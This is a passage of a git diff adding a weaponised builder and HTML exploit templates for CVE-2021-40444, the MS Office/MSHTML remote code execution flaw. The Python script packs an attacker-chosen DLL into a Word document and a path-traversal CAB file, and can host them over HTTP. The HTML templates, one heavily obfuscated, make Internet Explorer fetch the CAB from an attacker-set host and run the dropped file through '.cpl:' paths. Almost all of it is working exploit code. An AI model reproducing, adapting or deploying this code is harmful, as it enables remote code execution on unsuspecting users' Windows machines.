+    shutil.make_archive(str(word_doc), 'zip', str(tmp_path))
+    shutil.move(str(word_doc) + ".zip", str(word_doc))
+    shutil.rmtree(str(tmp_path))
+
+    print('[*] Generating CAB file...')
+    make_ddf(ddf_file=ddf, cab_file=cab_file, inf_file=inf_file)
+    shutil.move(word_dll, inf_file)
+
+    execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
+    patched_path = f'../{inf_file.name}'.encode()
+    patch_cab(cab_file, str(inf_file.name).encode(), patched_path)
+    shutil.copy(cab_file, srv_path)
+    shutil.copy(ddf, srv_path)
+
+    word_dll.unlink(missing_ok=True)
+    inf_file.unlink(missing_ok=True)
+    ddf.unlink(missing_ok=True)
+    shutil.rmtree(str(cab_path.absolute()))
+
+    print('[*] Updating information on HTML exploit...')
+    shutil.copy(str(html_template_file), str(html_final_file))
+
+    print('[*] Copying MS Word .docx to Desktop for local testing...')
+    dest = Path(os.getenv("USERPROFILE")).joinpath("Desktop").joinpath(word_doc.name)
+    dest.unlink(missing_ok=True)
+    shutil.copy(str(word_doc.absolute()), dest)
+
+    if copy_to and os.path.isdir(copy_to):
+        print(f'[*] Copying malicious cab to {copy_to} for analysis...')
+        dest = Path(copy_to).joinpath(cab_file.name)
+        dest.unlink(missing_ok=True)
+        shutil.copy(str(cab_file.absolute()), dest)
+        print(f'  [>] CAB file stored at: {cab_file}')
+
+    with InPlace(str(html_final_file)) as p_exp:
+        content = p_exp.read()
+        content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{cab_file.name}")
+        content = content.replace('<INF_CHANGE_HERE>', f"{inf_file.name}")
+        p_exp.write(content)
+
+    print(f'[+] Success! MS Word Document stored at: {word_doc}')
+
+
+def start_server(lport, directory: Path):
+    subprocess.Popen(
+        f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python -m http.server {lport}',
+        shell=True,
+        close_fds=True,
+        stderr=subprocess.DEVNULL,
+        stdout=subprocess.DEVNULL,
+        creationflags=subprocess.DETACHED_PROCESS
+    )
+
+
+def clean():
+    pass
+
+
+def validate_filename(filename):
+    # Required length for the file name
+    required_length = 12
+    current_length = 0 if not filename else len(filename)
+    gap = required_length - current_length
+    return filename + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(gap))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]')
+    parser.add_argument('-P', '--payload', type=str, required=True,
+                        help="DLL payload to use for the exploit")
+    parser.add_argument('-u', '--url', type=str, default=None, required=True,
+                        help="Server URL for malicious references (CAB->INF)")
+    parser.add_argument('-o', '--output', type=str, default=None, required=False,
+                        help="Output files basename (no extension)")
+    parser.add_argument('--host', action='store_true', default=False, required=False,
+                        help="If set, will host the payload after creation")
+    parser.add_argument('-p', '--lport', type=int, default=8080, required=False,
+                        help="Port to use when hosting malicious payload")
+    parser.add_argument('-c', '--copy-to', type=str, default=None, required=False,
+                        help="Copy payload to an alternate path")
+
+    args = parser.parse_args()
+
+    filename = validate_filename(args.output)
+
+    print('[*] Generating a malicious payload...')
+    try:
+        generate_payload(payload=args.payload, server_url=args.url, basename=filename, copy_to=args.copy_to)
+    except:
+        traceback.print_exc()
+    if args.host:
+        print('[*] Hosting HTML Exploit...')
+        start_server(lport=args.lport, directory=Path(__file__).parent.joinpath("srv"))
diff --git a/template/original.html b/template/original.html
new file mode 100644
index 0000000..4f7b2d5
--- /dev/null
+++ b/template/original.html
@@ -0,0 +1,3 @@
+<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>
+var a0_0x127f=['123','365952KMsRQT','tiveX','/Lo','./../../','contentDocument','ppD','Dat','close','Acti','removeChild','mlF','write','./A','ata/','ile','../','body','setAttribute','#version=5,0,0,0','ssi','iframe','748708rfmUTk','documentElement','lFile','location','159708hBVRtu','a/Lo','Script','document','call','contentWindow','emp','Document','Obj','prototype','lfi','bject','send','appendChild','Low/<INF_CHANGE_HERE>','htmlfile','115924pLbIpw','GET','p/<INF_CHANGE_HERE>','1109sMoXXX','./../A','htm','l/T','cal/','1wzQpCO','ect','w/<INF_CHANGE_HERE>','522415dmiRUA','<HOST_CHANGE_HERE>','88320wWglcB','XMLHttpRequest','<INF_CHANGE_HERE>','Act','D:edbc374c-5730-432a-b5b8-de94f0b57217','open','<bo','HTMLElement','/..','veXO','102FePAWC'];function a0_0x15ec(_0x329dba,_0x46107c){return a0_0x15ec=function(_0x127f75,_0x15ecd5){_0x127f75=_0x127f75-0xaa;var _0x5a770c=a0_0x127f[_0x127f75];return _0x5a770c;},a0_0x15ec(_0x329dba,_0x46107c);}(function(_0x59985d,_0x17bed8){var _0x1eac90=a0_0x15ec;while(!![]){try{var _0x2f7e2d=parseInt(_0x1eac90(0xce))+parseInt(_0x1eac90(0xd8))*parseInt(_0x1eac90(0xc4))+parseInt(_0x1eac90(0xc9))*-parseInt(_0x1eac90(0xad))+parseInt(_0x1eac90(0xb1))+parseInt(_0x1eac90(0xcc))+-parseInt(_0x1eac90(0xc1))+parseInt(_0x1eac90(0xda));if(_0x2f7e2d===_0x17bed8)break;else _0x59985d['push'](_0x59985d['shift']());}catch(_0x34af1e){_0x59985d['push'](_0x59985d['shift']());}}}(a0_0x127f,0x5df71),function(){var _0x2ee207=a0_0x15ec,_0x279eab=window,_0x1b93d7=_0x279eab[_0x2ee207(0xb4)],_0xcf5a2=_0x279eab[_0x2ee207(0xb8)]['prototype']['createElement'],_0x4d7c02=_0x279eab[_0x2ee207(0xb8)]['prototype'][_0x2ee207(0xe5)],_0x1ee31c=_0x279eab[_0x2ee207(0xd5)][_0x2ee207(0xba)][_0x2ee207(0xbe)],_0x2d20cd=_0x279eab[_0x2ee207(0xd5)][_0x2ee207(0xba)][_0x2ee207(0xe3)],_0x4ff114=_0xcf5a2['call'](_0x1b93d7,_0x2ee207(0xac));try{_0x1ee31c[_0x2ee207(0xb5)](_0x1b93d7[_0x2ee207(0xea)],_0x4ff114);}catch(_0x1ab454){_0x1ee31c[_0x2ee207(0xb5)](_0x1b93d7[_0x2ee207(0xae)],_0x4ff114);}var _0x403e5f=_0x4ff114[_0x2ee207(0xb6)]['ActiveXObject'],_0x224f7d=new _0x403e5f(_0x2ee207(0xc6)+_0x2ee207(0xbb)+'le');_0x4ff114[_0x2ee207(0xde)]['open']()[_0x2ee207(0xe1)]();var _0x371a71='p';try{_0x2d20cd[_0x2ee207(0xb5)](_0x1b93d7[_0x2ee207(0xea)],_0x4ff114);}catch(_0x3b004e){_0x2d20cd['call'](_0x1b93d7['documentElement'],_0x4ff114);}function _0x2511dc(){var _0x45ae57=_0x2ee207;return _0x45ae57(0xcd);}_0x224f7d['open']()[_0x2ee207(0xe1)]();var _0x3e172f=new _0x224f7d[(_0x2ee207(0xb3))][(_0x2ee207(0xd1))+'iveX'+(_0x2ee207(0xb9))+(_0x2ee207(0xca))]('htm'+_0x2ee207(0xaf));_0x3e172f[_0x2ee207(0xd3)]()[_0x2ee207(0xe1)]();var _0xd7e33d='c',_0x35b0d4=new _0x3e172f[(_0x2ee207(0xb3))]['Ac'+(_0x2ee207(0xdb))+'Ob'+'ject']('ht'+_0x2ee207(0xe4)+_0x2ee207(0xe8));_0x35b0d4[_0x2ee207(0xd3)]()[_0x2ee207(0xe1)]();var _0xf70c6e=new _0x35b0d4['Script'][(_0x2ee207(0xe2))+(_0x2ee207(0xd7))+(_0x2ee207(0xbc))]('ht'+'mlF'+_0x2ee207(0xe8));_0xf70c6e[_0x2ee207(0xd3)]()[_0x2ee207(0xe1)]();var _0xfed1ef=new ActiveXObject('htmlfile'),_0x5f3191=new ActiveXObject(_0x2ee207(0xc0)),_0xafc795=new ActiveXObject(_0x2ee207(0xc0)),_0x5a6d4b=new ActiveXObject('htmlfile'),_0x258443=new ActiveXObject('htmlfile'),_0x53c2ab=new ActiveXObject('htmlfile'),_0x3a627b=_0x279eab[_0x2ee207(0xcf)],_0x2c84a8=new _0x3a627b(),_0x220eee=_0x3a627b[_0x2ee207(0xba)][_0x2ee207(0xd3)],_0x3637d8=_0x3a627b[_0x2ee207(0xba)][_0x2ee207(0xbd)],_0x27de6f=_0x279eab['setTimeout'];_0x220eee[_0x2ee207(0xb5)](_0x2c84a8,_0x2ee207(0xc2),_0x2511dc(),![]),_0x3637d8[_0x2ee207(0xb5)](_0x2c84a8),_0xf70c6e[_0x2ee207(0xb3)][_0x2ee207(0xb4)][_0x2ee207(0xe5)](_0x2ee207(0xd4)+'dy>');var _0x126e83=_0xcf5a2[_0x2ee207(0xb5)](_0xf70c6e['Script'][_0x2ee207(0xb4)],'ob'+'je'+'ct');_0x126e83[_0x2ee207(0xeb)]('co'+'de'+'ba'+'se',_0x2511dc()+_0x2ee207(0xaa));var _0x487bfa='l';_0x126e83[_0x2ee207(0xeb)]('c'+'la'+_0x2ee207(0xab)+'d','CL'+'SI'+_0x2ee207(0xd2)),_0x1ee31c[_0x2ee207(0xb5)](_0xf70c6e[_0x2ee207(0xb3)]['document']['body'],_0x126e83),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'123',_0xfed1ef[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'123',_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef['Script']['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'123',_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'..'+'/.'+_0x2ee207(0xc5)+_0x2ee207(0xdf)+_0x2ee207(0xe7)+'Lo'+_0x2ee207(0xc8)+'T'+_0x2ee207(0xb7)+_0x2ee207(0xdc)+_0x2ee207(0xcb),_0x5f3191[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':.'+'./'+'..'+'/.'+_0x2ee207(0xe6)+'pp'+_0x2ee207(0xe0)+'a/Lo'+'ca'+_0x2ee207(0xc7)+'em'+'p/<INF_CHANGE_HERE>',_0xafc795[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'..'+_0x2ee207(0xd6)+'/.'+'./../A'+_0x2ee207(0xdf)+_0x2ee207(0xe7)+'Lo'+_0x2ee207(0xc8)+'T'+_0x2ee207(0xb7)+_0x2ee207(0xdc)+'w/<INF_CHANGE_HERE>',_0x5a6d4b[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':.'+'./'+_0x2ee207(0xe9)+'..'+'/.'+_0x2ee207(0xe6)+'pp'+'Dat'+_0x2ee207(0xb2)+'ca'+'l/T'+'em'+_0x2ee207(0xc3),_0x258443[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'..'+_0x2ee207(0xd6)+'/.'+_0x2ee207(0xdd)+'T'+_0x2ee207(0xb7)+_0x2ee207(0xdc)+_0x2ee207(0xcb),_0x5a6d4b['Script'][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':.'+'./'+'../'+'..'+'/.'+'./../T'+'em'+'p/<INF_CHANGE_HERE>',_0x5a6d4b[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xe9)+_0x2ee207(0xe9)+_0x2ee207(0xbf),_0x5a6d4b[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'../'+_0x2ee207(0xe9)+_0x2ee207(0xd0);}());
+  </script></body></html>
diff --git a/template/sample2.html b/template/sample2.html
new file mode 100644
index 0000000..57e81a0
--- /dev/null
+++ b/template/sample2.html
@@ -0,0 +1,69 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta http-equiv="Expires" content="-1">
+        <meta http-equiv="X-UA-Compatible" content="IE=11">
+    </head>
+    <body>
+        <script>
+            function garbage() {
+                return 'garbage';
+            }
+            (function exploit() {
+                var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
+                try {
+                    window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
+                } catch (_0x1ab454) {
+                    window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
+                }
+                var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile');
+                iframe['contentDocument']['open']()['close']();
+                try {
+                    window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
+                } catch (_0x3b004e) {
+                    window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
+                }
+                htmlfile2['open']()['close']();
+                var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
+                htmlfile3['open']()['close']();
+                var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
+                htmlfile4['open']()['close']();
+                var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
+                htmlfile5['open']()['close']();
+                var ActiveXObjectVAR = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
+                  , XMLHttpR = new window['XMLHttpRequest']()
+                  , XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
+                  , XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
+                XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]),
+                XMLHttpRsend['call'](XMLHttpR),
+                htmlfile5['Script']['document']['write']('body>');
+                var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
+                htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0');
+                htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
+                window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR2['Script']['location'] = '.cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR3['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR5['Script']['location'] = '.cpl:../../../../../Temp/Low/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../../Temp/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../Low/<INF_CHANGE_HERE>',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../<INF_CHANGE_HERE>';
+            }());
+        </script>
+    </body>
+</html>
diff --git a/template/sample3.html b/template/sample3.html
new file mode 100644
index 0000000..ae0e333
--- /dev/null
+++ b/template/sample3.html
@@ -0,0 +1,146 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="Expires" content="-1">
+    <meta http-equiv="X-UA-Compatible" content="IE=11">
+    <title>CVE-2021-40444</title>
+</head>
+<body>
+<script>
+  'use strict';
+/** @type {!Array} */
+var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>", "htmlfile", "115924pLbIpw", "GET", 
+"p/<INF_CHANGE_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"];
+/**
+ * @param {number} totalExpectedResults
+ * @param {?} entrySelector
+ * @return {?}
+ */
+function getValue(totalExpectedResults, entrySelector) {
+  return getValue = function(state, value) {
+    /** @type {number} */
+    state = state - 170;
+    var processorState = tokensArray[state];
+    return processorState;
+  }, getValue(totalExpectedResults, entrySelector);
+}
+(function(data, oldPassword) {
+  /** @type {function(number, ?): ?} */
+  var toMonths = getValue;
+  for (; !![];) {
+    try {
+      /** @type {number} */
+      var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218));
+      if (userPsd === oldPassword) {
+        break;
+      } else {
+        data["push"](data["shift"]());
+      }
+    } catch (_0x34af1e) {
+      data["push"](data["shift"]());
+    }
+  }
+})(tokensArray, 384881), function() {
+  /**
+   * @return {?}
+   */
+  function token_dash_lineno() {
+    /** @type {function(number, ?): ?} */
+    var addedRelations = currentRelations;
+    return addedRelations(205);
+  }
+  /** @type {function(number, ?): ?} */
+  var currentRelations = getValue;
+  /** @type {!Window} */
+  var global = window;
+  var document = global["document"];
+  var then = global["Document"]["prototype"]["createElement"];
+  var writeFunction = global["Document"]["prototype"]["write"];
+  var PL$22 = global["HTMLElement"]["prototype"]["appendChild"];
+  var $ = global["HTMLElement"]["prototype"]["removeChild"];
+  var el = then["call"](document, "iframe");
+  try {
+    PL$22["call"](document["body"], el);
+  } catch (_0x1ab454) {
+    PL$22["call"](document["documentElement"], el);
+  }
+  var ACTIVEX = el["contentWindow"]["ActiveXObject"];
+  var model = new ACTIVEX("htmlfile");
+  el["contentDocument"]["open"]()["close"]();
+  /** @type {string} */
+  var colname = "p";
+  try {
+    $["call"](document["body"], el);
+  } catch (_0x3b004e) {
+    $["call"](document["documentElement"], el);
+  }
+  model["open"]()["close"]();
+  var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile");
+  ops["open"]()["close"]();
+  /** @type {string} */
+  var _ = "c";
+  var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile");
+  TokenType["open"]()["close"]();
+  var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile");
+  view["open"]()["close"]();
+  var iedom = new ActiveXObject("htmlfile");
+  var rp_test = new ActiveXObject("htmlfile");
+  var htmlfile = new ActiveXObject("htmlfile");
+  var fake = new ActiveXObject("htmlfile");
+  var doc = new ActiveXObject("htmlfile");
+  var a = new ActiveXObject("htmlfile");
+  var Object = global["XMLHttpRequest"];
+  var args = new Object;
+  var ast = Object["prototype"]["open"];
+  var callbacks = Object["prototype"]["send"];
+  var modelIns = global["setTimeout"];
+  ast["call"](args, "GET", token_dash_lineno(), ![]);
+  callbacks["call"](args);
+  view["Script"]["document"]["write"]("<body>");
+  var s = then["call"](view["Script"]["document"], "object");
+  s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0");
+  /** @type {string} */
+  var i = "l";
+  s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
+  PL$22["call"](view["Script"]["document"]["body"], s);
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":123";
+  /** @type {string} */
+  iedom["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  rp_test["Script"]["location"] = "." + _ + colname + i + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  htmlfile["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  fake["Script"]["location"] = "." + _ + colname + i + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  doc["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/Low/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  fake["Script"]["location"] = "." + _ + colname + i + ":../../../../../Temp/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  fake["Script"]["location"] = "." + _ + colname + i + ":../../Low/<INF_CHANGE_HERE>";
+  /** @type {string} */
+  fake["Script"]["location"] = "." + _ + colname + i + ":../../<INF_CHANGE_HERE>";
+}();
+
+</script>
+
+</body>
+</html>
\ No newline at end of file